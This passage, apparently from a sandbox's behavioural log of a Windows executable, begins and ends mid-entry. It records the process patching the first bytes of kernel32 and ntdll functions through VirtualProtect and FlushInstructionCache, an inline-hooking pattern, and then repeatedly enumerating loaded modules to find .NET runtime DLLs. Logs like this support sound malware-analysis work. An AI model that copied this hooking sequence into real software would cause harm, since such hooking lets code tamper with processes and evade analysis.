returned 0x1ed2d40 [0214.938] VirtualProtect (in: lpAddress=0x1ed2d40, dwSize=0xa, flNewProtect=0x40, lpflOldProtect=0x18f898 | out: lpflOldProtect=0x18f898*=0x40) returned 1 [0214.939] VirtualProtect (in: lpAddress=0x769a4950, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x18f898 | out: lpflOldProtect=0x18f898*=0x20) returned 1 [0214.940] VirtualProtect (in: lpAddress=0x769a4950, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x18f898 | out: lpflOldProtect=0x18f898*=0x40) returned 1 [0214.963] GetCurrentProcess () returned 0xffffffff [0214.971] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x769a4950, dwSize=0x5) returned 1 [0214.998] GetModuleHandleA (lpModuleName="kernel32") returned 0x76990000 [0214.998] GetProcAddress (hModule=0x76990000, lpProcName="GetModuleFileNameA") returned 0x769a14b1 [0214.998] RtlAllocateHeap (HeapHandle=0x1ed0000, Flags=0x0, Size=0xa) returned 0x1ed2d58 [0214.998] VirtualProtect (in: lpAddress=0x1ed2d58, dwSize=0xa, flNewProtect=0x40, lpflOldProtect=0x18f88c | out: lpflOldProtect=0x18f88c*=0x40) returned 1 [0214.999] VirtualProtect (in: lpAddress=0x769a14b1, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x18f88c | out: lpflOldProtect=0x18f88c*=0x20) returned 1 [0214.999] VirtualProtect (in: lpAddress=0x769a14b1, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x18f88c | out: lpflOldProtect=0x18f88c*=0x40) returned 1 [0215.017] GetCurrentProcess () returned 0xffffffff [0215.017] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x769a14b1, dwSize=0x5) returned 1 [0215.017] GetModuleHandleA (lpModuleName="ntdll") returned 0x77c10000 [0215.017] GetProcAddress (hModule=0x77c10000, lpProcName="ZwCreateSection") returned 0x77c2ff94 [0215.017] RtlAllocateHeap (HeapHandle=0x1ed0000, Flags=0x0, Size=0xa) returned 0x1ed2d70 [0215.017] VirtualProtect (in: lpAddress=0x1ed2d70, dwSize=0xa, flNewProtect=0x40, lpflOldProtect=0x18f880 | out: lpflOldProtect=0x18f880*=0x40) returned 1 [0215.018] VirtualProtect (in: lpAddress=0x77c2ff94, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x18f880 | out: lpflOldProtect=0x18f880*=0x20) returned 1 [0215.018] VirtualProtect (in: lpAddress=0x77c2ff94, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x18f880 | out: lpflOldProtect=0x18f880*=0x40) returned 1 [0216.119] GetCurrentProcess () returned 0xffffffff [0216.119] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x77c2ff94, dwSize=0x5) returned 1 [0216.119] GetModuleHandleA (lpModuleName="kernel32") returned 0x76990000 [0216.119] GetProcAddress (hModule=0x76990000, lpProcName="CreateFileW") returned 0x769a3f5c [0216.126] RtlAllocateHeap (HeapHandle=0x1ed0000, Flags=0x0, Size=0xa) returned 0x1ed2d88 [0216.126] VirtualProtect (in: lpAddress=0x1ed2d88, dwSize=0xa, flNewProtect=0x40, lpflOldProtect=0x18f874 | out: lpflOldProtect=0x18f874*=0x40) returned 1 [0216.127] VirtualProtect (in: lpAddress=0x769a3f5c, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x18f874 | out: lpflOldProtect=0x18f874*=0x20) returned 1 [0216.128] VirtualProtect (in: lpAddress=0x769a3f5c, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x18f874 | out: lpflOldProtect=0x18f874*=0x40) returned 1 [0216.149] GetCurrentProcess () returned 0xffffffff [0216.149] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x769a3f5c, dwSize=0x5) returned 1 [0216.149] GetModuleHandleA (lpModuleName="kernel32") returned 0x76990000 [0216.149] GetProcAddress (hModule=0x76990000, lpProcName="GetFileSize") returned 0x769a196e [0216.149] RtlAllocateHeap (HeapHandle=0x1ed0000, Flags=0x0, Size=0xa) returned 0x1ed2da0 [0216.149] VirtualProtect (in: lpAddress=0x1ed2da0, dwSize=0xa, flNewProtect=0x40, lpflOldProtect=0x18f8b0 | out: lpflOldProtect=0x18f8b0*=0x40) returned 1 [0216.150] VirtualProtect (in: lpAddress=0x769a196e, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x18f8b0 | out: lpflOldProtect=0x18f8b0*=0x20) returned 1 [0216.150] VirtualProtect (in: lpAddress=0x769a196e, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x18f8b0 | out: lpflOldProtect=0x18f8b0*=0x40) returned 1 [0216.167] GetCurrentProcess () returned 0xffffffff [0216.167] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x769a196e, dwSize=0x5) returned 1 [0216.167] GetModuleHandleA (lpModuleName="kernel32") returned 0x76990000 [0216.168] GetProcAddress (hModule=0x76990000, lpProcName="MapViewOfFile") returned 0x769a18f1 [0216.168] RtlAllocateHeap (HeapHandle=0x1ed0000, Flags=0x0, Size=0xa) returned 0x1ed2db8 [0216.168] VirtualProtect (in: lpAddress=0x1ed2db8, dwSize=0xa, flNewProtect=0x40, lpflOldProtect=0x18f8a4 | out: lpflOldProtect=0x18f8a4*=0x40) returned 1 [0216.169] VirtualProtect (in: lpAddress=0x769a18f1, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x18f8a4 | out: lpflOldProtect=0x18f8a4*=0x20) returned 1 [0216.169] VirtualProtect (in: lpAddress=0x769a18f1, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x18f8a4 | out: lpflOldProtect=0x18f8a4*=0x40) returned 1 [0216.191] GetCurrentProcess () returned 0xffffffff [0216.191] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x769a18f1, dwSize=0x5) returned 1 [0216.191] GetModuleHandleA (lpModuleName="kernel32") returned 0x76990000 [0216.191] GetProcAddress (hModule=0x76990000, lpProcName="LoadLibraryExW") returned 0x769a495d [0216.191] RtlAllocateHeap (HeapHandle=0x1ed0000, Flags=0x0, Size=0xa) returned 0x1ed2dd0 [0216.191] VirtualProtect (in: lpAddress=0x1ed2dd0, dwSize=0xa, flNewProtect=0x40, lpflOldProtect=0x18f898 | out: lpflOldProtect=0x18f898*=0x40) returned 1 [0216.192] VirtualProtect (in: lpAddress=0x769a495d, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x18f898 | out: lpflOldProtect=0x18f898*=0x20) returned 1 [0216.192] VirtualProtect (in: lpAddress=0x769a495d, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x18f898 | out: lpflOldProtect=0x18f898*=0x40) returned 1 [0216.211] GetCurrentProcess () returned 0xffffffff [0216.211] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x769a495d, dwSize=0x5) returned 1 [0216.211] GetModuleHandleA (lpModuleName="kernel32") returned 0x76990000 [0216.211] GetProcAddress (hModule=0x76990000, lpProcName="CloseHandle") returned 0x769a1410 [0216.211] RtlAllocateHeap (HeapHandle=0x1ed0000, Flags=0x0, Size=0xa) returned 0x1ed2de8 [0216.211] VirtualProtect (in: lpAddress=0x1ed2de8, dwSize=0xa, flNewProtect=0x40, lpflOldProtect=0x18f88c | out: lpflOldProtect=0x18f88c*=0x40) returned 1 [0216.212] VirtualProtect (in: lpAddress=0x769a1410, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x18f88c | out: lpflOldProtect=0x18f88c*=0x20) returned 1 [0216.212] VirtualProtect (in: lpAddress=0x769a1410, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x18f88c | out: lpflOldProtect=0x18f88c*=0x40) returned 1 [0216.230] GetCurrentProcess () returned 0xffffffff [0216.230] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x769a1410, dwSize=0x5) returned 1 [0216.294] GetCurrentProcess () returned 0xffffffff [0216.294] EnumProcessModules (in: hProcess=0xffffffff, lphModule=0x18e09c, cb=0x1000, lpcbNeeded=0x18f2b0 | out: lphModule=0x18e09c, lpcbNeeded=0x18f2b0) returned 1 [0216.295] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x400000, lpmodinfo=0x18f2a4, cb=0xc | out: lpmodinfo=0x18f2a4*(lpBaseOfDll=0x400000, SizeOfImage=0x142000, EntryPoint=0x540c00)) returned 1 [0216.295] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77c10000, lpmodinfo=0x18f2a4, cb=0xc | out: lpmodinfo=0x18f2a4*(lpBaseOfDll=0x77c10000, SizeOfImage=0x180000, EntryPoint=0x0)) returned 1 [0216.295] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76990000, lpmodinfo=0x18f2a4, cb=0xc | out: lpmodinfo=0x18f2a4*(lpBaseOfDll=0x76990000, SizeOfImage=0x110000, EntryPoint=0x769a32d3)) returned 1 [0216.295] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x759d0000, lpmodinfo=0x18f2a4, cb=0xc | out: lpmodinfo=0x18f2a4*(lpBaseOfDll=0x759d0000, SizeOfImage=0x46000, EntryPoint=0x759d7478)) returned 1 [0216.295] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x767f0000, lpmodinfo=0x18f2a4, cb=0xc | out: lpmodinfo=0x18f2a4*(lpBaseOfDll=0x767f0000, SizeOfImage=0xa0000, EntryPoint=0x768049e5)) returned 1 [0216.295] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77170000, lpmodinfo=0x18f2a4, cb=0xc | out: lpmodinfo=0x18f2a4*(lpBaseOfDll=0x77170000, SizeOfImage=0xac000, EntryPoint=0x7717a472)) returned 1 [0216.296] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77590000, lpmodinfo=0x18f2a4, cb=0xc | out: lpmodinfo=0x18f2a4*(lpBaseOfDll=0x77590000, SizeOfImage=0x19000, EntryPoint=0x77594975)) returned 1 [0216.296] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76ac0000, lpmodinfo=0x18f2a4, cb=0xc | out: lpmodinfo=0x18f2a4*(lpBaseOfDll=0x76ac0000, SizeOfImage=0xf0000, EntryPoint=0x76ad0569)) returned 1 [0216.296] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75770000, lpmodinfo=0x18f2a4, cb=0xc | out: lpmodinfo=0x18f2a4*(lpBaseOfDll=0x75770000, SizeOfImage=0x60000, EntryPoint=0x7578a3b3)) returned 1 [0216.296] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75760000, lpmodinfo=0x18f2a4, cb=0xc | out: lpmodinfo=0x18f2a4*(lpBaseOfDll=0x75760000, SizeOfImage=0xc000, EntryPoint=0x757610e1)) returned 1 [0216.296] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f70000, lpmodinfo=0x18f2a4, cb=0xc | out: lpmodinfo=0x18f2a4*(lpBaseOfDll=0x76f70000, SizeOfImage=0x5000, EntryPoint=0x76f71438)) returned 1 [0216.297] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x770e0000, lpmodinfo=0x18f2a4, cb=0xc | out: lpmodinfo=0x18f2a4*(lpBaseOfDll=0x770e0000, SizeOfImage=0x57000, EntryPoint=0x770f9ba6)) returned 1 [0216.297] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76e50000, lpmodinfo=0x18f2a4, cb=0xc | out: lpmodinfo=0x18f2a4*(lpBaseOfDll=0x76e50000, SizeOfImage=0x90000, EntryPoint=0x76e66343)) returned 1 [0216.297] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76890000, lpmodinfo=0x18f2a4, cb=0xc | out: lpmodinfo=0x18f2a4*(lpBaseOfDll=0x76890000, SizeOfImage=0x100000, EntryPoint=0x768ab6ed)) returned 1 [0216.297] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76aa0000, lpmodinfo=0x18f2a4, cb=0xc | out: lpmodinfo=0x18f2a4*(lpBaseOfDll=0x76aa0000, SizeOfImage=0xa000, EntryPoint=0x76aa36a0)) returned 1 [0216.298] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x772c0000, lpmodinfo=0x18f2a4, cb=0xc | out: lpmodinfo=0x18f2a4*(lpBaseOfDll=0x772c0000, SizeOfImage=0x9d000, EntryPoint=0x772f3fd7)) returned 1 [0216.298] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x775e0000, lpmodinfo=0x18f2a4, cb=0xc | out: lpmodinfo=0x18f2a4*(lpBaseOfDll=0x775e0000, SizeOfImage=0x60000, EntryPoint=0x775f158f)) returned 1 [0216.298] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77640000, lpmodinfo=0x18f2a4, cb=0xc | out: lpmodinfo=0x18f2a4*(lpBaseOfDll=0x77640000, SizeOfImage=0xcc000, EntryPoint=0x7764168b)) returned 1 [0216.299] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755f0000, lpmodinfo=0x18f2a4, cb=0xc | out: lpmodinfo=0x18f2a4*(lpBaseOfDll=0x755f0000, SizeOfImage=0x4a000, EntryPoint=0x755f2e54)) returned 1 [0216.299] GetModuleBaseNameW (in: hProcess=0xffffffff, hModule=0x755f0000, lpBaseName=0x18f09c, nSize=0x104 | out: lpBaseName="mscoree.dll") returned 0xb [0216.504] StrStrIW (lpFirst="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll", lpSrch="\\system.ni.dll") returned 0x0 [0216.531] GetCurrentProcess () returned 0xffffffff [0216.531] EnumProcessModules (in: hProcess=0xffffffff, lphModule=0x18d98c, cb=0x1000, lpcbNeeded=0x18eba0 | out: lphModule=0x18d98c, lpcbNeeded=0x18eba0) returned 1 [0216.532] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x400000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x400000, SizeOfImage=0x142000, EntryPoint=0x540c00)) returned 1 [0216.532] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77c10000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x77c10000, SizeOfImage=0x180000, EntryPoint=0x0)) returned 1 [0216.532] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76990000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x76990000, SizeOfImage=0x110000, EntryPoint=0x769a32d3)) returned 1 [0216.532] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x759d0000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x759d0000, SizeOfImage=0x46000, EntryPoint=0x759d7478)) returned 1 [0216.533] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x767f0000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x767f0000, SizeOfImage=0xa0000, EntryPoint=0x768049e5)) returned 1 [0216.533] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77170000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x77170000, SizeOfImage=0xac000, EntryPoint=0x7717a472)) returned 1 [0216.533] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77590000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x77590000, SizeOfImage=0x19000, EntryPoint=0x77594975)) returned 1 [0216.533] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76ac0000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x76ac0000, SizeOfImage=0xf0000, EntryPoint=0x76ad0569)) returned 1 [0216.533] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75770000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x75770000, SizeOfImage=0x60000, EntryPoint=0x7578a3b3)) returned 1 [0216.533] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75760000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x75760000, SizeOfImage=0xc000, EntryPoint=0x757610e1)) returned 1 [0216.534] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f70000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x76f70000, SizeOfImage=0x5000, EntryPoint=0x76f71438)) returned 1 [0216.534] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x770e0000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x770e0000, SizeOfImage=0x57000, EntryPoint=0x770f9ba6)) returned 1 [0216.534] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76e50000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x76e50000, SizeOfImage=0x90000, EntryPoint=0x76e66343)) returned 1 [0216.534] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76890000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x76890000, SizeOfImage=0x100000, EntryPoint=0x768ab6ed)) returned 1 [0216.535] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76aa0000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x76aa0000, SizeOfImage=0xa000, EntryPoint=0x76aa36a0)) returned 1 [0216.535] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x772c0000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x772c0000, SizeOfImage=0x9d000, EntryPoint=0x772f3fd7)) returned 1 [0216.535] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x775e0000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x775e0000, SizeOfImage=0x60000, EntryPoint=0x775f158f)) returned 1 [0216.536] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77640000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x77640000, SizeOfImage=0xcc000, EntryPoint=0x7764168b)) returned 1 [0216.536] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755f0000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x755f0000, SizeOfImage=0x4a000, EntryPoint=0x755f2e54)) returned 1 [0216.536] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x754c0000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x754c0000, SizeOfImage=0x5f000, EntryPoint=0x754c2134)) returned 1 [0216.537] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75650000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x75650000, SizeOfImage=0x5000, EntryPoint=0x756511d0)) returned 1 [0216.537] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75ba0000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x75ba0000, SizeOfImage=0xc4a000, EntryPoint=0x75c21601)) returned 1 [0216.538] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755d0000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x755d0000, SizeOfImage=0x1c000, EntryPoint=0x755da431)) returned 1 [0216.538] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76ab0000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x76ab0000, SizeOfImage=0x6000, EntryPoint=0x76ab1782)) returned 1 [0216.539] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755c0000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x755c0000, SizeOfImage=0x7000, EntryPoint=0x755c128d)) returned 1 [0216.539] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75330000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x75330000, SizeOfImage=0x190000, EntryPoint=0x753cd026)) returned 1 [0216.539] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f80000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x76f80000, SizeOfImage=0x15c000, EntryPoint=0x76fcba3d)) returned 1 [0216.540] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75250000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x75250000, SizeOfImage=0xd4000, EntryPoint=0x752830d2)) returned 1 [0216.541] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75150000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x75150000, SizeOfImage=0xf5000, EntryPoint=0x751a4160)) returned 1 [0216.541] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75010000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x75010000, SizeOfImage=0x13b000, EntryPoint=0x750ecc89)) returned 1 [0216.542] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75000000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x75000000, SizeOfImage=0xd000, EntryPoint=0x750013e4)) returned 1 [0216.542] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74fa0000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x74fa0000, SizeOfImage=0x5f000, EntryPoint=0x0)) returned 1 [0216.543] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74f10000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x74f10000, SizeOfImage=0x78000, EntryPoint=0x74f1f7ba)) returned 1 [0216.543] GetModuleBaseNameW (in: hProcess=0xffffffff, hModule=0x74f10000, lpBaseName=0x18e98c, nSize=0x104 | out: lpBaseName="mscoreei.dll") returned 0xc [0216.544] GetCurrentProcess () returned 0xffffffff [0216.544] EnumProcessModules (in: hProcess=0xffffffff, lphModule=0x18d998, cb=0x1000, lpcbNeeded=0x18ebac | out: lphModule=0x18d998, lpcbNeeded=0x18ebac) returned 1 [0216.545] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x400000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x400000, SizeOfImage=0x142000, EntryPoint=0x540c00)) returned 1 [0216.545] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77c10000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x77c10000, SizeOfImage=0x180000, EntryPoint=0x0)) returned 1 [0216.545] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76990000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x76990000, SizeOfImage=0x110000, EntryPoint=0x769a32d3)) returned 1 [0216.545] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x759d0000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x759d0000, SizeOfImage=0x46000, EntryPoint=0x759d7478)) returned 1 [0216.545] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x767f0000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x767f0000, SizeOfImage=0xa0000, EntryPoint=0x768049e5)) returned 1 [0216.545] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77170000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x77170000, SizeOfImage=0xac000, EntryPoint=0x7717a472)) returned 1 [0216.546] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77590000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x77590000, SizeOfImage=0x19000, EntryPoint=0x77594975)) returned 1 [0216.546] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76ac0000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x76ac0000, SizeOfImage=0xf0000, EntryPoint=0x76ad0569)) returned 1 [0216.546] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75770000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x75770000, SizeOfImage=0x60000, EntryPoint=0x7578a3b3)) returned 1 [0216.546] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75760000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x75760000, SizeOfImage=0xc000, EntryPoint=0x757610e1)) returned 1 [0216.546] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f70000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x76f70000, SizeOfImage=0x5000, EntryPoint=0x76f71438)) returned 1 [0216.547] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x770e0000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x770e0000, SizeOfImage=0x57000, EntryPoint=0x770f9ba6)) returned 1 [0216.547] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76e50000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x76e50000, SizeOfImage=0x90000, EntryPoint=0x76e66343)) returned 1 [0216.547] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76890000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x76890000, SizeOfImage=0x100000, EntryPoint=0x768ab6ed)) returned 1 [0216.547] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76aa0000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x76aa0000, SizeOfImage=0xa000, EntryPoint=0x76aa36a0)) returned 1 [0216.548] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x772c0000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x772c0000, SizeOfImage=0x9d000, EntryPoint=0x772f3fd7)) returned 1 [0216.548] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x775e0000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x775e0000, SizeOfImage=0x60000, EntryPoint=0x775f158f)) returned 1 [0216.548] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77640000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x77640000, SizeOfImage=0xcc000, EntryPoint=0x7764168b)) returned 1 [0216.549] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755f0000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x755f0000, SizeOfImage=0x4a000, EntryPoint=0x755f2e54)) returned 1 [0216.549] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x754c0000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x754c0000, SizeOfImage=0x5f000, EntryPoint=0x754c2134)) returned 1 [0216.550] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75650000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x75650000, SizeOfImage=0x5000, EntryPoint=0x756511d0)) returned 1 [0216.550] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75ba0000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x75ba0000, SizeOfImage=0xc4a000, EntryPoint=0x75c21601)) returned 1 [0216.550] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755d0000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x755d0000, SizeOfImage=0x1c000, EntryPoint=0x755da431)) returned 1 [0216.551] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76ab0000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x76ab0000, SizeOfImage=0x6000, EntryPoint=0x76ab1782)) returned 1 [0216.551] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755c0000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x755c0000, SizeOfImage=0x7000, EntryPoint=0x755c128d)) returned 1 [0216.552] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75330000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x75330000, SizeOfImage=0x190000, EntryPoint=0x753cd026)) returned 1 [0216.552] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f80000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x76f80000, SizeOfImage=0x15c000, EntryPoint=0x76fcba3d)) returned 1 [0216.553] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75250000, lpmodinfo=0x18eba0, cb=0xc | out: 